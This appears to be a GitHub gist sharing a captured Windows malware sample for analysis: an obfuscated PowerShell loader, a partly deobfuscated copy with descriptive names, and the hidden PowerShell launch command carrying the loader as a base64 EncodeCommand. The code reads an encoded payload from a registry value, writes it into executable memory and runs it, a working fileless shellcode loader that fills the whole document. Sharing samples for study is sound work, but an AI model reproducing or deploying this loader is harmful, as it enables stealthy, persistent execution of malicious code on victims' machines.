Created
August 6, 2018 15:01
-
-
Save NathanTheGr8/cfca0126c2d32c307007ec488ea24d3d to your computer and use it in GitHub Desktop.
An Unknown Malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $SEf8caWj = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";$lZ7VgLztH = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";function ogbehJFrvi{Param([OutputType([Type])][Parameter( Position = 0)][Type[]]$jbvI6kAQ = (New-Object Type[](0)),[Parameter( Position = 1 )][Type]$TnlpqF = [Void])$SDaRf4 = [AppDomain]::CurrentDomain;$gV2cj6vD = New-Object System.Reflection.AssemblyName('ReflectedDelegate');$koQPMj5 = $SDaRf4.DefineDynamicAssembly($gV2cj6vD, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);$mQQYfW = $koQPMj5.DefineDynamicModule('InMemoryModule', $false);$OSepm3U = $mQQYfW.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$GetNMD0W = $OSepm3U.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $jbvI6kAQ);$GetNMD0W.SetImplementationFlags('Runtime, Managed');$KBBPUUP = $OSepm3U.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $TnlpqF, $jbvI6kAQ);$KBBPUUP.SetImplementationFlags('Runtime, Managed');Write-Output $OSepm3U.CreateType();}function E66iaPG5($msLPAB, $r9dr88) {$ycPUx = $msLPAB[$r9dr88+0] * 16777216;$ycPUx += $msLPAB[$r9dr88+1] * 65536;$ycPUx += $msLPAB[$r9dr88+2] * 256;$ycPUx += $msLPAB[$r9dr88+3] * 1;return $ycPUx;}$wFNcJpGX = @" | |
| [DllImport("kernel32.dll")]public static extern IntPtr GetCurrentProcess();[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);[DllImport("kernel32.dll")]public static extern uint SetErrorMode(uint uMode); | |
| "@ | |
| $Xf7iI2 = Add-Type -memberDefinition $wFNcJpGX -Name "Win32" -namespace Win32Functions -passthru;function OaI9ZGaig5($wFNcJpGX, $dAau1, $M5hD1rY) {$r9PSH = $Xf7iI2::GetCurrentProcess();$hOVIPH = $Xf7iI2::VirtualAlloc(0,$wFNcJpGX.Length,0x00003000,0x40);$KpfaBcgtS = $Xf7iI2::VirtualAlloc(0,$M5hD1rY.Length,0x00003000,0x40);$Xf7iI2::WriteProcessMemory($r9PSH, $hOVIPH, $wFNcJpGX, $wFNcJpGX.Length, 0) | Out-Null;$Xf7iI2::WriteProcessMemory($r9PSH, $KpfaBcgtS, $M5hD1rY, $M5hD1rY.Length, 0) | Out-Null;$MNZhhv = [IntPtr]($hOVIPH.ToInt64()+$dAau1);$JjmOV = ogbehJFrvi @([IntPtr], [IntPtr]) ([Void]);$DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MNZhhv, $JjmOV);$Xf7iI2::SetErrorMode(0x8006) | Out-Null;$DFAhyM.Invoke($KpfaBcgtS, $hOVIPH);}function iPpKRn8YS($wiIvdTk9qx, $XA1pa) {$IahTr = E66iaPG5 $wiIvdTk9qx 1;$mi0LSt1A = 5;while ($mi0LSt1A+8 -lt $IahTr) {$QheRB6j6 = $wiIvdTk9qx[$mi0LSt1A];$z2i2CBvTZG = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+1);$UAaIjo1Ssa = E66iaPG5 $wiIvdTk9qx ($mi0LSt1A+5);$mi0LSt1A += 9;if ($QheRB6j6 -eq $XA1pa) {OaI9ZGaig5 $wiIvdTk9qx[$mi0LSt1A..($mi0LSt1A+$z2i2CBvTZG)] $UAaIjo1Ssa $wiIvdTk9qx;break;} else {$mi0LSt1A += $z2i2CBvTZG;}}}$naO5fn = (Get-ItemProperty -Path "$SEf8caWj" -Name "$lZ7VgLztH").$lZ7VgLztH;$wiIvdTk9qx = [System.Convert]::FromBase64String($naO5fn);$wiIvdTk9qx[0] = 0;if ([IntPtr]::Size -eq 8) {iPpKRn8YS $wiIvdTk9qx 2;} else {iPpKRn8YS $wiIvdTk9qx 1;} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Related resources | |
| # - https://github.com/EmpireProject/Empire/blob/master/data/module_source/ImportTable_execution/Invoke-DllInjection.ps1 | |
| # - http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html | |
| $RegKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell"; | |
| $RegName = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}"; | |
| function Get-DelegateType { | |
| Param | |
| ( | |
| [OutputType([Type])] | |
| [Parameter( Position = 0)] | |
| [Type[]] | |
| $Parameters = (New-Object Type[](0)), | |
| [Parameter( Position = 1 )] | |
| [Type] | |
| $ReturnType = [Void] | |
| ) | |
| $Domain = [AppDomain]::CurrentDomain; | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate'); | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run); | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false); | |
| $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]); | |
| $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters); | |
| $ConstructorBuilder.SetImplementationFlags('Runtime, Managed'); | |
| $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters); | |
| $MethodBuilder.SetImplementationFlags('Runtime, Managed'); | |
| Write-Output $TypeBuilder.CreateType(); | |
| } | |
| function Unknown-FunctionTwo($F2DataIn, $Integer_2) { | |
| $DataOut = $F2DataIn[$Integer_2+0] * 16777216; | |
| $DataOut += $F2DataIn[$Integer_2+1] * 65536; | |
| $DataOut += $F2DataIn[$Integer_2+2] * 256; | |
| $DataOut += $F2DataIn[$Integer_2+3] * 1; | |
| return $DataOut; | |
| } | |
| $ImportTable = @" | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr GetCurrentProcess(); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll")] | |
| public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written); | |
| [DllImport("kernel32.dll")] | |
| public static extern uint SetErrorMode(uint uMode); | |
| "@ | |
| $WinFunc = Add-Type -memberDefinition $ImportTable -Name "Win32" -namespace Win32Functions -passthru; | |
| function Unknown-FunctionThree($ImportTable, $dAau1, $M5hD1rY) { | |
| $HandlerGetCurrentProcess = $WinFunc::GetCurrentProcess(); | |
| $HandlerVirtualAlloc1 = $WinFunc::VirtualAlloc(0, $ImportTable.Length, 0x00003000, 0x40); | |
| $HandlerVirtualAlloc2 = $WinFunc::VirtualAlloc(0, $M5hD1rY.Length, 0x00003000, 0x40); | |
| $WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc1, $ImportTable, $ImportTable.Length, 0) | Out-Null; | |
| $WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc2, $M5hD1rY, $M5hD1rY.Length, 0) | Out-Null; | |
| $IntOfHandlerVirtualAlloc1PlusdAau1 = [IntPtr]($HandlerVirtualAlloc1.ToInt64()+$dAau1); | |
| $JjmOV = Get-DelegateType @([IntPtr], [IntPtr]) ([Void]); | |
| $DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IntOfHandlerVirtualAlloc1PlusdAau1, $JjmOV); | |
| $WinFunc::SetErrorMode(0x8006) | Out-Null; | |
| $DFAhyM.Invoke($HandlerVirtualAlloc2, $HandlerVirtualAlloc1); | |
| } | |
| function Unknown-FunctionFour($ByteArrayFromEnImportTabledData, $integer_1) { | |
| $IahTr = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData 1; | |
| $value_5 = 5; | |
| while ($value_5+8 -lt $IahTr) { | |
| $QheRB6j6 = $ByteArrayFromEnImportTabledData[$value_5]; | |
| $z2i2CBvTZG = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+1); | |
| $UAaIjo1Ssa = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+5); | |
| $value_5 += 9; | |
| if ($QheRB6j6 -eq $integer_1) { | |
| Unknown-FunctionThree $ByteArrayFromEnImportTabledData[$value_5..($value_5+$z2i2CBvTZG)] $UAaIjo1Ssa $ByteArrayFromEnImportTabledData; | |
| break; | |
| } else { | |
| $value_5 += $z2i2CBvTZG; | |
| } | |
| } | |
| } | |
| $EnImportTabledData = (Get-ItemProperty -Path "$RegKey" -Name "$RegName").$RegName; | |
| $ByteArrayFromEnImportTabledData = [System.Convert]::FromBase64String($EnImportTabledData); | |
| $ByteArrayFromEnImportTabledData[0] = 0; | |
| if ([IntPtr]::Size -eq 8) { | |
| # x64 branch | |
| Unknown-FunctionFour $ByteArrayFromEnImportTabledData 2; | |
| } else { | |
| # x86 branch | |
| Unknown-FunctionFour $ByteArrayFromEnImportTabledData 1; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| C:\Windows\System32\WindowsPowershell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodeCommand JABTAEUAZgA4AGMAYQBXAGoAIAA9ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABTAGgAZQBsAGwAIgA7ACQAbABaADcAVgBnAEwAegB0AEgAIAA9ACAAIgB7ADQARgBGADIAMwBCADMAOAAtAEMANQBBADEALQA1AEMAQgBFAC0ARgAyADUARAA0ADUAOABFADEARgA4AEMANQA2ADQAMgB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABvAGcAYgBlAGgASgBGAHIAdgBpAHsAUABhAHIAYQBtACgAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBUAHkAcABlAF0AKQBdAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAwACkAXQBbAFQAeQBwAGUAWwBdAF0AJABqAGIAdgBJADYAawBBAFEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVAB5AHAAZQBbAF0AKAAwACkAKQAsAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACAAKQBdAFsAVAB5AHAAZQBdACQAVABuAGwAcABxAEYAIAA9ACAAWwBWAG8AaQBkAF0AKQAkAFMARABhAFIAZgA0ACAAPQAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgA7ACQAZwBWADIAYwBqADYAdgBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7ACQAawBvAFEAUABNAGoANQAgAD0AIAAkAFMARABhAFIAZgA0AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAkAGcAVgAyAGMAagA2AHYARAAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAQQBjAGMAZQBzAHMAXQA6ADoAUgB1AG4AKQA7ACQAbQBRAFEAWQBmAFcAIAA9ACAAJABrAG8AUQBQAE0AagA1AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgACQAZgBhAGwAcwBlACkAOwAkAE8AUwBlAHAAbQAzAFUAIAA9ACAAJABtAFEAUQBZAGYAVwAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAEcAZQB0AE4ATQBEADAAVwAgAD0AIAAkAE8AUwBlAHAAbQAzAFUALgBEAGUAZgBpAG4AZQBDAG8AbgBzAHQAcgB1AGMAdABvAHIAKAAnAFIAVABTAHAAZQBjAGkAYQBsAE4AYQBtAGUALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABQAHUAYgBsAGkAYwAnACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEMAYQBsAGwAaQBuAGcAQwBvAG4AdgBlAG4AdABpAG8AbgBzAF0AOgA6AFMAdABhAG4AZABhAHIAZAAsACAAJABqAGIAdgBJADYAawBBAFEAKQA7ACQARwBlAHQATgBNAEQAMABXAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkAOwAkAEsAQgBCAFAAVQBVAFAAIAA9ACAAJABPAFMAZQBwAG0AMwBVAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAVABuAGwAcABxAEYALAAgACQAagBiAHYASQA2AGsAQQBRACkAOwAkAEsAQgBCAFAAVQBVAFAALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7AFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJABPAFMAZQBwAG0AMwBVAC4AQwByAGUAYQB0AGUAVAB5AHAAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEUANgA2AGkAYQBQAEcANQAoACQAbQBzAEwAUABBAEIALAAgACQAcgA5AGQAcgA4ADgAKQAgAHsAJAB5AGMAUABVAHgAIAAgAD0AIAAkAG0AcwBMAFAAQQBCAFsAJAByADkAZAByADgAOAArADAAXQAgACoAIAAxADYANwA3ADcAMgAxADYAOwAkAHkAYwBQAFUAeAAgACsAPQAgACQAbQBzAEwAUABBAEIAWwAkAHIAOQBkAHIAOAA4ACsAMQBdACAAKgAgADYANQA1ADMANgA7ACQAeQBjAFAAVQB4ACAAKwA9ACAAJABtAHMATABQAEEAQgBbACQAcgA5AGQAcgA4ADgAKwAyAF0AIAAqACAAMgA1ADYAOwAkAHkAYwBQAFUAeAAgACsAPQAgACQAbQBzAEwAUABBAEIAWwAkAHIAOQBkAHIAOAA4ACsAMwBdACAAKgAgADEAOwByAGUAdAB1AHIAbgAgACQAeQBjAFAAVQB4ADsAfQAkAHcARgBOAGMASgBwAEcAWAAgAD0AIABAACIACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHAAcgBvAGMAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAYQBkAGQAcgBlAHMAcwAsACAAYgB5AHQAZQBbAF0AIABiAHUAZgBmAGUAcgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB3AHIAaQB0AHQAZQBuACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAUwBlAHQARQByAHIAbwByAE0AbwBkAGUAKAB1AGkAbgB0ACAAdQBNAG8AZABlACkAOwAKACIAQAAKACQAWABmADcAaQBJADIAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEYATgBjAEoAcABHAFgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAZgB1AG4AYwB0AGkAbwBuACAATwBhAEkAOQBaAEcAYQBpAGcANQAoACQAdwBGAE4AYwBKAHAARwBYACwAIAAkAGQAQQBhAHUAMQAsACAAJABNADUAaABEADEAcgBZACkAIAB7ACQAcgA5AFAAUwBIACAAPQAgACQAWABmADcAaQBJADIAOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwAkAGgATwBWAEkAUABIACAAPQAgACQAWABmADcAaQBJADIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAdwBGAE4AYwBKAHAARwBYAC4ATABlAG4AZwB0AGgALAAwAHgAMAAwADAAMAAzADAAMAAwACwAMAB4ADQAMAApADsAJABLAHAAZgBhAEIAYwBnAHQAUwAgAD0AIAAkAFgAZgA3AGkASQAyADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAE0ANQBoAEQAMQByAFkALgBMAGUAbgBnAHQAaAAsADAAeAAwADAAMAAwADMAMAAwADAALAAwAHgANAAwACkAOwAkAFgAZgA3AGkASQAyADoAOgBXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoACQAcgA5AFAAUwBIACwAIAAkAGgATwBWAEkAUABIACwAIAAkAHcARgBOAGMASgBwAEcAWAAsACAAJAB3AEYATgBjAEoAcABHAFgALgBMAGUAbgBnAHQAaAAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAWABmADcAaQBJADIAOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJAByADkAUABTAEgALAAgACQASwBwAGYAYQBCAGMAZwB0AFMALAAgACQATQA1AGgARAAxAHIAWQAsACAAJABNADUAaABEADEAcgBZAC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAE0ATgBaAGgAaAB2ACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQAaABPAFYASQBQAEgALgBUAG8ASQBuAHQANgA0ACgAKQArACQAZABBAGEAdQAxACkAOwAkAEoAagBtAE8AVgAgAD0AIABvAGcAYgBlAGgASgBGAHIAdgBpACAAQAAoAFsASQBuAHQAUAB0AHIAXQAsACAAWwBJAG4AdABQAHQAcgBdACkAIAAoAFsAVgBvAGkAZABdACkAOwAkAEQARgBBAGgAeQBNACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACQATQBOAFoAaABoAHYALAAgACQASgBqAG0ATwBWACkAOwAkAFgAZgA3AGkASQAyADoAOgBTAGUAdABFAHIAcgBvAHIATQBvAGQAZQAoADAAeAA4ADAAMAA2ACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJABEAEYAQQBoAHkATQAuAEkAbgB2AG8AawBlACgAJABLAHAAZgBhAEIAYwBnAHQAUwAsACAAJABoAE8AVgBJAFAASAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABpAFAAcABLAFIAbgA4AFkAUwAoACQAdwBpAEkAdgBkAFQAawA5AHEAeAAsACAAJABYAEEAMQBwAGEAKQAgAHsAJABJAGEAaABUAHIAIAA9ACAARQA2ADYAaQBhAFAARwA1ACAAJAB3AGkASQB2AGQAVABrADkAcQB4ACAAMQA7ACQAbQBpADAATABTAHQAMQBBACAAPQAgADUAOwB3AGgAaQBsAGUAIAAoACQAbQBpADAATABTAHQAMQBBACsAOAAgAC0AbAB0ACAAJABJAGEAaABUAHIAKQAgAHsAJABRAGgAZQBSAEIANgBqADYAIAA9ACAAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAJABtAGkAMABMAFMAdAAxAEEAXQA7ACQAegAyAGkAMgBDAEIAdgBUAFoARwAgAD0AIABFADYANgBpAGEAUABHADUAIAAkAHcAaQBJAHYAZABUAGsAOQBxAHgAIAAoACQAbQBpADAATABTAHQAMQBBACsAMQApADsAJABVAEEAYQBJAGoAbwAxAFMAcwBhACAAPQAgAEUANgA2AGkAYQBQAEcANQAgACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgACgAJABtAGkAMABMAFMAdAAxAEEAKwA1ACkAOwAkAG0AaQAwAEwAUwB0ADEAQQAgACsAPQAgADkAOwBpAGYAIAAoACQAUQBoAGUAUgBCADYAagA2ACAALQBlAHEAIAAkAFgAQQAxAHAAYQApACAAewBPAGEASQA5AFoARwBhAGkAZwA1ACAAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAJABtAGkAMABMAFMAdAAxAEEALgAuACgAJABtAGkAMABMAFMAdAAxAEEAKwAkAHoAMgBpADIAQwBCAHYAVABaAEcAKQBdACAAJABVAEEAYQBJAGoAbwAxAFMAcwBhACAAJAB3AGkASQB2AGQAVABrADkAcQB4ADsAYgByAGUAYQBrADsAfQAgAGUAbABzAGUAIAB7ACQAbQBpADAATABTAHQAMQBBACAAKwA9ACAAJAB6ADIAaQAyAEMAQgB2AFQAWgBHADsAfQB9AH0AJABuAGEATwA1AGYAbgAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAUwBFAGYAOABjAGEAVwBqACIAIAAtAE4AYQBtAGUAIAAiACQAbABaADcAVgBnAEwAegB0AEgAIgApAC4AJABsAFoANwBWAGcATAB6AHQASAA7ACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAGEATwA1AGYAbgApADsAJAB3AGkASQB2AGQAVABrADkAcQB4AFsAMABdACAAPQAgADAAOwBpAGYAIAAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApACAAewBpAFAAcABLAFIAbgA4AFkAUwAgACQAdwBpAEkAdgBkAFQAawA5AHEAeAAgADIAOwB9ACAAZQBsAHMAZQAgAHsAaQBQAHAASwBSAG4AOABZAFMAIAAkAHcAaQBJAHYAZABUAGsAOQBxAHgAIAAxADsAfQAKAA== |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment